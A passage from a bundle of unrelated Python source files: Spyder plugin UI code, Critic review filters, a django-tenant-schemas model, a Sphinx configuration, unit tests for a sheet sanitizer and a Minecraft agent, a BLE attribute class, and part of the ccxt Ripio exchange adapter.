font_size_delta = self.RICH_FONT_SIZE_DELTA
else:
option = 'font'
font_size_delta = self.FONT_SIZE_DELTA
return get_font(option=option, font_size_delta=font_size_delta)
def set_plugin_font(self):
"""
Set plugin font option.
Note: All plugins in Spyder use a global font. To define a different
size, the plugin must define a 'FONT_SIZE_DELTA' class variable.
"""
raise Exception("Plugins font is based on the general settings, "
"and cannot be set directly on the plugin."
"This method is deprecated.")
def _create_toggle_view_action(self):
"""Associate a toggle view action with each plugin"""
title = self.get_plugin_title()
if self.CONF_SECTION == 'editor':
title = _('Editor')
if self.shortcut is not None:
action = create_action(self, title,
toggled=lambda checked: self.toggle_view(checked),
shortcut=QKeySequence(self.shortcut),
context=Qt.WidgetShortcut)
else:
action = create_action(self, title, toggled=lambda checked:
self.toggle_view(checked))
self._toggle_view_action = action
@Slot()
def _close_window(self):
"""Close QMainWindow instance that contains this plugin."""
if self._undocked_window is not None:
self._undocked_window.close()
self._undocked_window = None
# Oddly, these actions can appear disabled after the Dock
# action is pressed
self._undock_action.setDisabled(False)
self._close_plugin_action.setDisabled(False)
@Slot()
def _create_window(self):
"""Create a QMainWindow instance containing this plugin."""
self._undocked_window = window = PluginWindow(self)
window.setAttribute(Qt.WA_DeleteOnClose)
icon = self.get_plugin_icon()
if is_text_string(icon):
icon = self.get_icon(icon)
window.setWindowIcon(icon)
window.setWindowTitle(self.get_plugin_title())
window.setCentralWidget(self)
window.resize(self.size())
self.refresh_plugin()
self.set_ancestor(window)
self.dockwidget.setFloating(False)
self.dockwidget.setVisible(False)
window.show()
@Slot(bool)
def _on_top_level_changed(self, top_level):
"""Actions to perform when a plugin is undocked to be moved."""
if top_level:
self._undock_action.setDisabled(True)
else:
self._undock_action.setDisabled(False)
def _visibility_changed(self, enable):
"""Dock widget visibility has changed."""
if self.dockwidget is None:
return
if enable:
self.dockwidget.raise_()
widget = self.get_focus_widget()
if widget is not None and self._undocked_window is not None:
widget.setFocus()
visible = self.dockwidget.isVisible() or self._ismaximized
if self.DISABLE_ACTIONS_WHEN_HIDDEN:
toggle_actions(self._plugin_actions, visible)
self._isvisible = enable and visible
if self._isvisible:
self.refresh_plugin()
def _refresh_actions(self):
"""Refresh Options menu."""
self._options_menu.clear()
# Decide what additional actions to show
if self._undocked_window is None:
additional_actions = [MENU_SEPARATOR,
self._undock_action,
self._close_plugin_action]
else:
additional_actions = [MENU_SEPARATOR,
self._dock_action]
# Create actions list
self._plugin_actions = self.get_plugin_actions() + additional_actions
add_actions(self._options_menu, self._plugin_actions)
if sys.platform == 'darwin':
set_menu_icons(self._options_menu, True)
def _setup(self):
"""
Setup Options menu, create toggle action and connect signals.
"""
# Creat toggle view action
self._create_toggle_view_action()
# Create Options menu
self._plugin_actions = self.get_plugin_actions() + [MENU_SEPARATOR,
self._undock_action]
add_actions(self._options_menu, self._plugin_actions)
self.options_button.setMenu(self._options_menu)
self._options_menu.aboutToShow.connect(self._refresh_actions)
# Show icons in Mac plugin menus
if sys.platform == 'darwin':
self._options_menu.aboutToHide.connect(
lambda menu=self._options_menu:
set_menu_icons(menu, False))
# Update title
self.sig_update_plugin_title.connect(self._update_plugin_title)
self.setWindowTitle(self.get_plugin_title())
def _register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=False):
"""Register a shortcut associated to a QAction or QShortcut."""
self.main.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip,
self.CONF_SECTION)
def _get_color_scheme(self):
"""Get the current color scheme."""
return get_color_scheme(CONF.get('appearance', 'selected'))
def _add_dockwidget(self):
"""Add dockwidget to the main window and set it up."""
self.main.add_dockwidget(self)
# This is not necessary for the Editor because it calls
# _setup directly on init.
if self.CONF_SECTION != 'editor':
self._setup()
def _tabify(self, core_plugin):
"""Tabify plugin next to a core plugin."""
self.main.tabify_plugins(core_plugin, self)
|
# -*- mode: python; encoding: utf-8 -*-
#
# Copyright 2014 the Critic contributors, Opera Software ASA
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import api
class RepositoryFilter(object):
def __init__(self, subject_id, filter_type, path, filter_id, repository_id,
delegate_string, repository=None):
self.__subject_id = subject_id
self.__subject = None
self.type = filter_type
self.path = path
self.id = filter_id
self.__repository_id = repository_id
self.__repository = repository
self.__delegate_string = delegate_string
self.__delegates = None
def getSubject(self, critic):
if self.__subject is None:
self.__subject = api.user.fetch(critic, user_id=self.__subject_id)
return self.__subject
def getRepository(self, critic):
if self.__repository is None:
self.__repository = api.repository.fetch(
critic, repository_id=self.__repository_id)
return self.__repository
def getDelegates(self, critic):
if self.__delegates is None:
self.__delegates = frozenset(
api.user.fetch(critic, name=name.strip())
for name in filter(None, self.__delegate_string.split(",")))
return self.__delegates
class ReviewFilter(object):
def __init__(self, subject_id, filter_type, path, filter_id, review_id,
creator_id):
self.__subject_id = subject_id
self.__subject = None
self.type = filter_type
self.path = path
self.id = filter_id
self.__review_id = review_id
self.__review = None
self.__creator_id = creator_id
self.__creator = None
def getSubject(self, critic):
if self.__subject is None:
self.__subject = api.user.fetch(critic, user_id=self.__subject_id)
return self.__subject
def getReview(self, critic):
if self.__review is None:
self.__review = api.review.fetch(critic, review_id=self.__review_id)
return self.__review
def getCreator(self, critic):
if self.__creator is None:
self.__creator = api.user.fetch(critic, user_id=self.__creator_id)
return self.__creator
|
"""
plotStats() method to collect statistics for the track data.
Author: Kunal Singh
Email: pykunalsingh@gmail.com
"""
def plotStats(fileName):
# read in a playlist
with open(fileName, 'rb') as fp:
plist = plistlib.load(fp)
# get the tracks from the playlist
tracks = plist['Tracks']
# create lists of songs rating and track durations
ratings = []
durations = []
# iterate through the tracks
for trackId, track in tracks.items():
try:
ratings.append(track['Album Rating'])
durations.append(track['Total Time'])
except:
pass
# ensure that vaild data was collected
if ratings == [] or durations == []:
print("No valid Album Rating/Total Time data in %s."%fileName)
return
|
from django.core.management import call_command
from django.db import connection, connections, models
from tenant_schemas.postgresql_backend.base import _check_schema_name
from tenant_schemas.signals import post_schema_sync
from tenant_schemas.utils import (get_public_schema_name, schema_exists,
MultipleDBError, has_multiple_db, get_db_string)
class TenantQueryset(models.QuerySet):
"""
QuerySet for instances that inherit from the TenantMixin.
"""
def delete(self):
"""
Make sure we call the delete method of each object in the queryset so
that safety checks and schema deletion (if requested) are executed
even when using bulk delete.
"""
counter, counter_dict = 0, {}
for obj in self:
result = obj.delete()
if result is not None:
current_counter, current_counter_dict = result
counter += current_counter
counter_dict.update(current_counter_dict)
if counter:
return counter, counter_dict
class TenantMixin(models.Model):
"""
All tenant models must inherit this class.
"""
auto_drop_schema = False
"""
USE THIS WITH CAUTION!
Set this flag to true on a parent class if you want the schema to be
automatically deleted if the tenant row gets deleted.
"""
auto_create_schema = True
"""
Set this flag to false on a parent class if you don't want the schema
to be automatically created upon save.
"""
domain_url = models.CharField(max_length=128, unique=True)
db_string = models.CharField(max_length=128, blank=True, null=True)
schema_name = models.CharField(max_length=63, unique=True,
validators=[_check_schema_name])
objects = TenantQueryset.as_manager()
class Meta:
abstract = True
def get_db(self, **kwargs):
"""
If single db, return default
If multiple_db and db specified in 'using' kwarg, return db
If request_cfg set through multidb router, return set db
"""
return self.db_string
def save(self, verbosity=1, *args, **kwargs):
is_new = self.pk is None
if not self.db_string:
self.db_string = get_db_string(self.schema_name)
db = self.db_string
from django.db import connection
if db:
connection = connections[db]
if is_new and connection.schema_name != get_public_schema_name():
raise Exception("Can't create tenant outside the public schema. "
"Current schema is %s." % connection.schema_name)
elif not is_new and connection.schema_name not in (self.schema_name, get_public_schema_name()):
raise Exception("Can't update tenant outside it's own schema or "
"the public schema. Current schema is %s."
% connection.schema_name)
super(TenantMixin, self).save(*args, **kwargs)
if is_new and self.auto_create_schema:
try:
self.create_schema(check_if_exists=True, verbosity=verbosity, db=db)
except Exception as e:
# We failed creating the tenant, delete what we created and
# re-raise the exception
self.delete(force_drop=True, using=db)
raise
else:
post_schema_sync.send(sender=TenantMixin, tenant=self)
def delete(self, force_drop=False, *args, **kwargs):
"""
Deletes this row. Drops the tenant's schema if the attribute
auto_drop_schema set to True.
"""
from django.db import connection
db = self.db_string
if db:
connection = connections[db]
if connection.schema_name not in (self.schema_name, get_public_schema_name()):
raise Exception("Can't delete tenant outside it's own schema or "
"the public schema. Current schema is %s."
% connection.schema_name)
if schema_exists(self.schema_name) and (self.auto_drop_schema or force_drop):
cursor = connection.cursor()
cursor.execute('DROP SCHEMA IF EXISTS %s CASCADE' % self.schema_name)
return super(TenantMixin, self).delete(*args, **kwargs)
def create_schema(self, check_if_exists=False, sync_schema=True,
verbosity=1, db=None):
"""
Creates the schema 'schema_name' for this tenant. Optionally checks if
the schema already exists before creating it. Returns true if the
schema was created, false otherwise.
"""
# safety check
from django.db import connection, connections
_check_schema_name(self.schema_name)
if db:
connection = connections[db]
cursor = connection.cursor()
if check_if_exists and schema_exists(self.schema_name, db=db):
return False
# create the schema
cursor.execute('CREATE SCHEMA %s' % self.schema_name)
if sync_schema:
if db:
call_command('migrate_schemas',
schema_name=self.schema_name,
interactive=False,
verbosity=verbosity,
database=db)
else:
call_command('migrate_schemas',
schema_name=self.schema_name,
interactive=False,
verbosity=verbosity)
connection.set_schema_to_public()
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../../'))
# -- Project information -----------------------------------------------------
project = 'IndoFashion: Apparel Classification for Indian Ethnic Clothes'
copyright = '2021, Pranjal Singh Rajput, Shivangi Aneja'
author = 'Pranjal Singh Rajput, Shivangi Aneja'
# The full version, including alpha/beta/rc tags
release = '1.0'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"recommonmark",
"sphinx.ext.autodoc",
"sphinx.ext.napoleon",
"sphinx.ext.intersphinx",
"sphinx.ext.todo",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.viewcode",
"sphinx.ext.githubpages",
]
# -- Configurations for plugins ------------
napoleon_google_docstring = True
napoleon_include_init_with_doc = True
napoleon_include_special_with_doc = True
napoleon_numpy_docstring = False
napoleon_use_rtype = False
autodoc_inherit_docstrings = False
autodoc_member_order = "bysource"
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffixes of The file extensions of source files. Sphinx considers the files with this suffix as sources. The
# value can be a dictionary mapping file extensions to file types. For example: source_suffix = { '.rst':
# 'restructuredtext', '.txt': 'restructuredtext', '.md': 'markdown', }
source_suffix = [".rst", ".md"]
# The master toctree document
master_doc = 'index'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of Pygments (syntax highlighting) style to use
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
def setup(app):
from recommonmark.transform import AutoStructify
app.add_config_value(
"recommonmark_config",
{"enable_math": True, "enable_inline_math": True, "enable_eval_rst": True},
True,
)
app.add_transform(AutoStructify)
|
import sanitize_sheet
import pytest
def test_check_info():
info = ['abcdef']
assert(sanitize_sheet.check_sampleNames(info))
info = ['abcdefghijklmnopqrstuvwxy1234']
with pytest.raises(Exception):
sanitize_sheet.check_info(info)
def test_check_for_sequence():
assert(sanitize_sheet.check_for_sequence([float('nan')]))
assert(sanitize_sheet.check_for_sequence(['filename.seq']))
with pytest.raises(Exception):
sanitize_sheet.check_for_sequence(['ACDEFGHIIH'])
def test_proposalNum():
proposalNums = ['123456']
assert(sanitize_sheet.check_proposalNum(proposalNums))
proposalNums = ['su123456']
with pytest.raises(Exception):
sanitize_sheet.check_proposalNum(proposalNums)
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
"""
import unittest
import droidlet.base_util
import droidlet.lowlevel.minecraft.shape_helpers
import droidlet.lowlevel.minecraft.shapes
import droidlet.lowlevel.minecraft.shapes as shapes
from agents.craftassist.tests.base_craftassist_test_case import BaseCraftassistTestCase
from droidlet.interpreter.tests.all_test_commands import *
class GetMemoryTestCase(BaseCraftassistTestCase):
def setUp(self):
super().setUp()
cube_triples = {"has_name": "cube", "has_shape": "cube"}
self.cube = self.add_object(droidlet.lowlevel.minecraft.shapes.cube(bid=(42, 0)), (9, 63, -2), relations=cube_triples)
sphere_triples = {"has_name": "sphere", "has_shape": "sphere"}
self.sphere = self.add_object(
shapes.sphere(radius=1), (11, 64, 2), relations=sphere_triples
)
triangle_triples = {"has_name": "triangle", "has_shape": "triangle"}
self.triangle = self.add_object(shapes.triangle(), (6, 64, -5), relations=triangle_triples)
self.set_looking_at(list(self.cube.blocks.keys())[0])
def test_get_name_and_left_of(self):
# set the name
name = "fluffball"
self.agent.memory.add_triple(subj=self.cube.memid, pred_text="has_name", obj_text=name)
# get the name
d = GET_MEMORY_COMMANDS["what is where I am looking"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn(name, self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["what is to the left of the cube?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("triangle", self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["what is the thing closest to you?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
# note: the agent excludes itself from these by default, maybe fix?
self.assertIn("SPEAKER", self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["what is the thing closest to me?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
# note: the agent does NOT!! exclude SPEAKER...
# FIXME?
self.assertIn("SPEAKER", self.last_outgoing_chat())
def test_what_are_you_doing(self):
d = DANCE_COMMANDS["dance"]
self.handle_logical_form(d)
# start building a cube
d = BUILD_COMMANDS["build a small cube"]
self.handle_logical_form(d, max_steps=9)
# what are you doing?
d = GET_MEMORY_COMMANDS["what are you doing"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("build", self.last_outgoing_chat())
assert not "dance" in self.last_outgoing_chat()
def test_what_are_you_building(self):
# start building a cube
d = BUILD_COMMANDS["build a small cube"]
self.handle_logical_form(d, max_steps=12)
# what are you building
d = GET_MEMORY_COMMANDS["what are you building"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("cube", self.last_outgoing_chat())
def test_where_are_you_going(self):
# start moving
d = MOVE_COMMANDS["move to 42 65 0"]
self.handle_logical_form(d, max_steps=3)
# where are you going?
d = GET_MEMORY_COMMANDS["where are you going"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("42", self.last_outgoing_chat())
self.assertIn("65", self.last_outgoing_chat())
def test_where_are_you(self):
# move to origin
d = MOVE_COMMANDS["move to 0 63 0"]
self.handle_logical_form(d)
# where are you?
d = GET_MEMORY_COMMANDS["where are you"]
self.handle_logical_form(d)
# check that proper chat was sent
loc_in_chat = (
"(0.0, 63.0, 0.0)" in self.last_outgoing_chat()
or "(0, 63, 0)" in self.last_outgoing_chat()
)
assert loc_in_chat
class GetMemoryCountAndSizeTest(BaseCraftassistTestCase):
def setUp(self):
super().setUp()
red_cube_triples = {"has_name": "cube", "has_shape": "cube", "has_colour": "red"}
blue_cube_triples = {"has_name": "cube", "has_shape": "cube", "has_colour": "blue"}
red_sphere_triples = {"has_name": "sphere", "has_shape": "sphere", "has_colour": "red"}
blue_sphere_triples = {"has_name": "sphere", "has_shape": "sphere", "has_colour": "blue"}
self.cube1 = self.add_object(
droidlet.lowlevel.minecraft.shapes.cube(size=2, bid=(35, 14)), (19, 63, 14), relations=red_cube_triples
)
self.cube2 = self.add_object(
droidlet.lowlevel.minecraft.shapes.cube(size=2, bid=(35, 14)), (15, 63, 15), relations=red_cube_triples
)
self.cube3 = self.add_object(
droidlet.lowlevel.minecraft.shapes.cube(size=3, bid=(35, 11)), (14, 63, 19), relations=blue_cube_triples
)
self.sphere1 = self.add_object(
shapes.sphere(bid=(35, 14), radius=2), (14, 63, 8), relations=red_sphere_triples
)
self.sphere2 = self.add_object(
shapes.sphere(bid=(35, 11), radius=2), (8, 63, 14), relations=blue_sphere_triples
)
self.set_looking_at(list(self.cube1.blocks.keys())[0])
def test_counts_and_size(self):
d = GET_MEMORY_COMMANDS["how many cubes are there?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("3", self.last_outgoing_chat())
# Note that the command is slightly malformed, no "memory_type" key
d = GET_MEMORY_COMMANDS["how many blue things are there?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("2", self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["how many blocks are in the blue cube?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("27", self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["how tall is the blue cube?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("3", self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["how wide is the red cube?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("2", self.last_outgoing_chat())
if __name__ == "__main__":
unittest.main()
|
from .ble_attribute_abstract import BleAttributeAbstract
class BleRemoteAttributeAbstract(BleAttributeAbstract):
def __init__(self, params):
super().__init__(params)
self.isRemote = False
self.discoverdOnRemote = False
@property
def ws_child_uuid_name(self):
children_name = self.children_name
if not children_name:
return None
children_name = children_name[:-1]
return children_name + "_uuid"
def get_child(self, uuid):
obj = super().get_child(uuid)
if not obj:
obj = self.add_child({"uuid": uuid})
return obj
# discoverChildren() {}
# discoverChildrenWait() {
# return new Promise(resolve => {
# self.emitter.once('discoverfinished', () => {
# children = self.children.filter(elm => {
# return elm.discoverdOnRemote
# })
# resolve(children)
# })
# self.discoverChildren()
# })
# }
#
# CALLBACKS
#
def ondiscover(self):
pass
# ondiscoverfinished() {}
def notify_from_server(self, notify_name, params):
super().notify_from_server(notify_name, params)
if notify_name == "discover":
child = self.get_child(params[self.ws_child_uuid_name])
child.discoverdOnRemote = True
child.properties = params.get("properties", [])
self.ondiscover(child)
elif notify_name == "discoverfinished":
children = [elm for elm in self.children if elm.discoverdOnRemote]
self.ondiscoverfinished(children)
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import DDoSProtection
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class ripio(Exchange):
def describe(self):
return self.deep_extend(super(ripio, self).describe(), {
'id': 'ripio',
'name': 'Ripio',
'countries': ['AR', 'BR'], # Argentina
'rateLimit': 50,
'version': 'v1',
'pro': True,
# new metainfo interface
'has': {
'cancelOrder': True,
'CORS': None,
'createOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchCurrencies': True,
'fetchMyTrades': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTrades': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/94507548-a83d6a80-0218-11eb-9998-28b9cec54165.jpg',
'api': {
'public': 'https://api.exchange.ripio.com/api',
'private': 'https://api.exchange.ripio.com/api',
},
'www': 'https://exchange.ripio.com',
'doc': [
'https://exchange.ripio.com/en/api/',
],
'fees': 'https://exchange.ripio.com/en/fee',
},
'api': {
'public': {
'get': [
'rate/all/',
'rate/{pair}/',
'orderbook/{pair}/',
'tradehistory/{pair}/',
'pair/',
'currency/',
'orderbook/{pair}/depth/',
],
},
'private': {
'get': [
'balances/exchange_balances/',
'order/{pair}/{order_id}/',
'order/{pair}/',
'trade/{pair}/',
],
'post': [
'order/{pair}/',
'order/{pair}/{order_id}/cancel/',
],
},
},
'fees': {
'trading': {
'tierBased': True,
'percentage': True,
'taker': 0.0 / 100,
'maker': 0.0 / 100,
},
},
'precisionMode': TICK_SIZE,
'requiredCredentials': {
'apiKey': True,
'secret': False,
},
'exceptions': {
'exact': {
},
'broad': {
'Authentication credentials were not provided': AuthenticationError, # {"detail":"Authentication credentials were not provided."}
'Disabled pair': BadSymbol, # {"status_code":400,"errors":{"pair":["Invalid/Disabled pair BTC_ARS"]},"message":"An error has occurred, please check the form."}
'Invalid order type': InvalidOrder, # {"status_code":400,"errors":{"order_type":["Invalid order type. Valid options: ['MARKET', 'LIMIT']"]},"message":"An error has occurred, please check the form."}
'Your balance is not enough': InsufficientFunds, # {"status_code":400,"errors":{"non_field_errors":["Your balance is not enough for self order: You have 0 BTC but you need 1 BTC"]},"message":"An error has occurred, please check the form."}
"Order couldn't be created": ExchangeError, # {'status_code': 400,'errors': {'non_field_errors': _("Order couldn't be created")}, 'message': _('Seems like an unexpected error occurred. Please try again later or write us to support@ripio.com if the problem persists.')}
# {"status_code":404,"errors":{"order":["Order 286e560e-b8a2-464b-8b84-15a7e2a67eab not found."]},"message":"An error has occurred, please check the form."}
# {"status_code":404,"errors":{"trade":["Trade <trade_id> not found."]},"message":"An error has occurred, please check the form."}
'not found': OrderNotFound,
'Invalid pair': BadSymbol, # {"status_code":400,"errors":{"pair":["Invalid pair FOOBAR"]},"message":"An error has occurred, please check the form."}
'amount must be a number': BadRequest, # {"status_code":400,"errors":{"amount":["amount must be a number"]},"message":"An error has occurred, please check the form."}
'Total must be at least': InvalidOrder, # {"status_code":400,"errors":{"non_field_errors":["Total must be at least 10."]},"message":"An error has occurred, please check the form."}
'Account not found': BadRequest, # {"error_description": "Account not found."}, "status": 404
'Wrong password provided': AuthenticationError, # {'error': "Wrong password provided."}, “status_code”: 400
'User tokens limit': DDoSProtection, # {'error': "User tokens limit. Can't create more than 10 tokens."}, “status_code”: 400
'Something unexpected ocurred': ExchangeError, # {'status_code': 400, 'errors': {'non_field_errors': 'Something unexpected ocurred!'}, 'message': 'Seems like an unexpected error occurred. Please try again later or write us to support@ripio.com if the problem persists.'}
# {'status_code': 404, 'errors': {'account_balance': ['Exchange balance <currency>not found.']},'message': 'An error has occurred, please check the form.'}
# {'status_code': 404, 'errors': {'account_balance': ['Account balance <id> not found.']},'message': 'An error has occurred, please check the form.'}
'account_balance': BadRequest,
},
},
})
def fetch_markets(self, params={}):
response = self.publicGetPair(params)
#
# {
# "next":null,
# "previous":null,
# "results":[
# {
# "base":"BTC",
# "base_name":"Bitcoin",
# "quote":"USDC",
# "quote_name":"USD Coin",
# "symbol":"BTC_USDC",
# "fees":[
# {"traded_volume":0.0,"maker_fee":0.0,"taker_fee":0.0,"cancellation_fee":0.0}
# ],
# "country":"ZZ",
# "enabled":true,
# "priority":10,
# "min_amount":"0.00001",
# "price_tick":"0.000001",
# "min_value":"10",
# "limit_price_threshold":"25.00"
# },
# ]
# }
#
result = []
results = self.safe_value(response, 'results', [])
for i in range(0, len(results)):
market = results[i]
baseId = self.safe_string(market, 'base')
quoteId = self.safe_string(market, 'quote')
id = self.safe_string(market, 'symbol')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
precision = {
'amount': self.safe_number(market, 'min_amount'),
'price': self.safe_number(market, 'price_tick'),
}
limits = {
'amount': {
'min': self.safe_number(market, 'min_amount'),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(market, 'min_value'),
'max': None,
},
}
active = self.safe_value(market, 'enabled', True)
fees = self.safe_value(market, 'fees', [])
firstFee = self.safe_value(fees, 0, {})
maker = self.safe_number(firstFee, 'maker_fee', 0.0)
taker = self.safe_number(firstFee, 'taker_fee', 0.0)
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'precision': precision,
'maker': maker,
'taker': taker,
'limits': limits,
'info': market,
'active': active,
})
return result
def fetch_currencies(self, params={}):
response = self.publicGetCurrency(params)
#
# {
# "next":null,
# "previous":null,
# "results":[
# {
# "name":"Argentine Peso",
# "symbol":"$",
# "currency":"ARS",
# "country":"AR",
# "decimal_places":"2",
# "enabled":true
# },
# {
# "name":"Bitcoin Cash",
# "symbol":"BCH",
# "currency":"BCH",
# "country":"AR",
# "decimal_places":"8",
# "enabled":true
# },
# {
# "name":"Bitcoin",
# "symbol":"BTC",
# "currency":"BTC",
# "country":"AR",
# "decimal_places":"8",
# "enabled":true
# }
# ]
# }
#
results = self.safe_value(response, 'results', [])
result = {}
for i in range(0, len(results)):
currency = results[i]
id = self.safe_string(currency, 'currency')
code = self.safe_currency_code(id)
name = self.safe_string(currency, 'name')
active = self.safe_value(currency, 'enabled', True)
precision = self.safe_integer(currency, 'decimal_places')
result[code] = {
'id': id,
'code': code,
'name': name,
'info': currency, # the original payload
'active': active,
'fee': None,
'precision': precision,
'limits': {
'amount': {'min': None, 'max': None},
'withdraw': {'min': None, 'max': None},
},
}
return result
def parse_ticker(self, ticker, market=None):
#
# fetchTicker, fetchTickers
#
# {
# "pair":"BTC_USDC",
# "last_price":"10850.02",
# "low":"10720.03",
# "high":"10909.99",
# "variation":"1.21",
# "volume":"0.83868",
# "base":"BTC",
# "base_name":"Bitcoin",
# "quote":"USDC",
# "quote_name":"USD Coin",
# "bid":"10811.00",
# "ask":"10720.03",
# "avg":"10851.47",
# "ask_volume":"0.00140",
# "bid_volume":"0.00185",
# "created_at":"2020-09-28 21:44:51.228920+00:00"
# }
#
timestamp = self.parse8601(self.safe_string(ticker, 'created_at'))
marketId = self.safe_string(ticker, 'pair')
symbol = self.safe_symbol(marketId, market)
last = self.safe_number(ticker, 'last_price')
average = self.safe_number(ticker, 'avg')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'bid'),
'bidVolume': self.safe_number(ticker, 'bid_volume'),
'ask': self.safe_number(ticker, 'ask'),
'askVolume': self.safe_number(ticker, 'ask_volume'),
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': average,
'baseVolume': None,
'quoteVolume': None,
'info': ticker,
}
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
response = self.publicGetRatePair(self.extend(request, params))
#
# {
# "pair":"BTC_USDC",
# "last_price":"10850.02",
# "low":"10720.03",
# "high":"10909.99",
# "variation":"1.21",
# "volume":"0.83868",
# "base":"BTC",
# "base_name":"Bitcoin",
# "quote":"USDC",
# "quote_name":"USD Coin",
# "bid":"10811.00",
# "ask":"10720.03",
# "avg":"10851.47",
# "ask_volume":"0.00140",
# "bid_volume":"0.00185",
# "created_at":"2020-09-28 21:44:51.228920+00:00"
# }
#
return self.parse_ticker(response, market)
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.publicGetRateAll(params)
#
# [
# {
# "pair":"BTC_USDC",
# "last_price":"10850.02",
# "low":"10720.03",
# "high":"10909.99",
# "variation":"1.21",
# "volume":"0.83868",
# "base":"BTC",
# "base_name":"Bitcoin",
# "quote":"USDC",
# "quote_name":"USD Coin",
# "bid":"10811.00",
# "ask":"10720.03",
# "avg":"10851.47",
# "ask_volume":"0.00140",
# "bid_volume":"0.00185",
# "created_at":"2020-09-28 21:44:51.228920+00:00"
# }
# ]
#
result = {}
for i in range(0, len(response)):
ticker = self.parse_ticker(response[i])
symbol = ticker['symbol']
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
request = {
'pair': self.market_id(symbol),
}
response = self.publicGetOrderbookPair(self.extend(request, params))
#
# {
# "buy":[
# {"amount":"0.00230","total":"24.95","price":"10850.02"},
# {"amount":"0.07920","total":"858.52","price":"10840.00"},
# {"amount":"0.00277","total":"30.00","price":"10833.03"},
# ],
# "sell":[
# {"amount":"0.03193","total":"348.16","price":"10904.00"},
# {"amount":"0.00210","total":"22.90","price":"10905.70"},
# {"amount":"0.00300","total":"32.72","price":"10907.98"},
# ],
# "updated_id":47225
# }
#
orderbook = self.parse_order_book(response, symbol, None, 'buy', 'sell', 'price', 'amount')
orderbook['nonce'] = self.safe_integer(response, 'updated_id')
return orderbook
def parse_trade(self, trade, market=None):
#
# public fetchTrades, private fetchMyTrades
#
# {
# "created_at":1601322501,
# "amount":"0.00276",
# "price":"10850.020000",
